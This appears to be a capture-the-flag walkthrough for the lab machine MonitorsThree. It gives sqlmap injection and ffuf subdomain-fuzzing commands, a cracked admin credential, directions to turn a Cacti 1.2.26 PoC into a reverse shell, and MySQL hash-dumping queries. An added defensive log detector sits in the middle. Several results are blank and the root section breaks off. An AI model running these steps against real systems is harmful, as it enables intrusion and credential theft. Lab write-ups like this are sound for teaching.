MonitorsThree
Linux machine
Foothold
Do not forget to update the /etc/hosts file.
Nmap port scan
Visit the website. We will find a login page and a "request password change" page.
We will try sqlmap against the password-reset form.
Since it is a time-based injection, guess as much as possible up front (parameter, database, table, column and target row) so sqlmap has less to extract:
sqlmap -u http://monitorsthree.htb/forgot_password.php --data username=asd -p username -D monitorsthree_db -T users -C password --dump --time-sec 1 --where "username='admin'"
Crack the MD5 password hash (save the hash to a file first):
result:
Next we can enumerate subdomains:
ffuf -w /usr/share/wordlists/dirb/big.txt -H "Host: FUZZ.monitorsthree.htb" -u http://monitorsthree.htb -fs 1590
We find a cacti subdomain. Add it to /etc/hosts and log in with the credentials found above.
Optionally, we can enumerate valid users, since the response differs depending on whether the user exists ("Login failed" vs "Login Failed").
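As an added defensive counterpart to the sqlmap and ffuf steps above (this is not part of the original writeup), a small log-side detector for the two patterns they leave behind: slow, repeated POSTs to forgot_password.php from the time-based injection, and one client cycling many Host header values and getting the same-size default page back. The log format, client IPs and thresholds are assumptions constructed for the example.

```python
import re
from collections import defaultdict

# Assumed custom Apache LogFormat (constructed for this example):
#   "%a %{Host}i \"%r\" %>s %B %D"   -> %D is the response time in microseconds
LINE_RE = re.compile(
    r'^(?P<ip>\S+) (?P<host>\S+) "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+) (?P<us>\d+)$'
)

# Constructed sample traffic: one client probing the reset form with ~1 s delays,
# then cycling Host values and getting the same 1590-byte default vhost page back.
SAMPLE_LOG = [
    f'10.10.14.5 monitorsthree.htb "POST /forgot_password.php HTTP/1.1" 200 2311 {1000000 + i * 1500}'
    for i in range(8)
] + [
    f'10.10.14.5 host{i}.monitorsthree.htb "GET / HTTP/1.1" 200 1590 4200'
    for i in range(25)
] + ['10.10.14.9 monitorsthree.htb "GET /login.php HTTP/1.1" 200 1880 3100']

def parse(line):
    m = LINE_RE.match(line)
    return m.groupdict() if m else None

def detect(lines, slow_ms=900, min_slow=5, min_hosts=20):
    """Return {client_ip: [finding, ...]} for clients showing either pattern."""
    slow_posts = defaultdict(int)               # ip -> slow POSTs to the reset form
    hosts_seen = defaultdict(set)               # ip -> distinct Host header values
    size_counts = defaultdict(lambda: defaultdict(int))  # ip -> response size -> count
    for line in lines:
        r = parse(line)
        if r is None:
            continue
        ip = r["ip"]
        # Time-based SQLi: a burst of requests each taking about the injected delay (--time-sec 1)
        if r["method"] == "POST" and r["path"] == "/forgot_password.php" \
                and int(r["us"]) >= slow_ms * 1000:
            slow_posts[ip] += 1
        hosts_seen[ip].add(r["host"])
        size_counts[ip][r["bytes"]] += 1
    findings = defaultdict(list)
    for ip in set(slow_posts) | set(hosts_seen):
        if slow_posts[ip] >= min_slow:
            findings[ip].append(f"time-based SQLi suspected: {slow_posts[ip]} slow POSTs to /forgot_password.php")
        # Vhost brute force: many Host values from one client, nearly all answered with the same page size
        if len(hosts_seen[ip]) >= min_hosts:
            same = max(size_counts[ip].values())
            findings[ip].append(f"vhost fuzzing suspected: {len(hosts_seen[ip])} distinct Host values, {same} same-size responses")
    return dict(findings)
```

Tune slow_ms to the delay sqlmap was told to use; with a 1 s delay, normal reset-form requests of a few milliseconds never trip the threshold.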
Use admin:greencacti2001.
Search for an exploit for Cacti version 1.2.26.
We find https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88.
Use the PoC to generate the payload (copy its contents into a file, replace the dummy code with a reverse shell, preferably a Python one) and follow its instructions.
Do not forget to start a shell listener.
User
Find the database credentials in the application config (/var/www/html/cacti/include/config.php).
The database has a users table; we want the password hash of the marcus user.
mysql -u cactiuser -p <<< cactiuser
show databases;
use cacti;
show tables;
select * from user_auth;
Crack it:
result:
Now we log in as marcus with the password we just cracked:
Read the user flag.
Root
Use the
Read the flag.